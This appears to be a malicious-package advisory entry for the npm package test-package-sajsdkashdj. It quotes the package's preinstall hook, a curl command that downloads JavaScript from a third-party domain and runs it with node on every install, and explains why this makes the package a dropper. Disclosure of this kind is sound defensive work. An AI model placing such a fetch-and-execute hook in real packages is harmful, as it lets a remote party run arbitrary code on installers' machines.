MAL-2026-6266
Dashboard / Malicious Package / MAL-2026-6266
MAL-2026-6266
Summary: Malicious code in test-package-sajsdkashdj (npm)
Details: Source: amazon-inspector (62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87) package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the package downloads JavaScript from poc.amanrawat.com and immediately executes it with node under the installer's privileges. The fetched content is unpinned, unhashed, served from a third-party non-publisher domain, and mutable — whoever controls poc.amanrawat.com can ship arbitrary code to every installer at any time. The package itself contains no functionality beyond this dropper. The package name (test-package-sajsdkashdj) and the fetch target (a path named hehe.js on a personal-looking domain) further indicate this is not a legitimate distribution mechanism.
References: https://www.npmjs.com/package/test-package-sajsdkashdj/v/2.1.6, https://www.npmjs.com/package/test-package-sajsdkashdj/v/2.1.7
Affected packages
Package
Name: test-package-sajsdkashdj
Purl: pkg:npm/test-package-sajsdkashdj
Affected ranges
Type: N/A
Events:
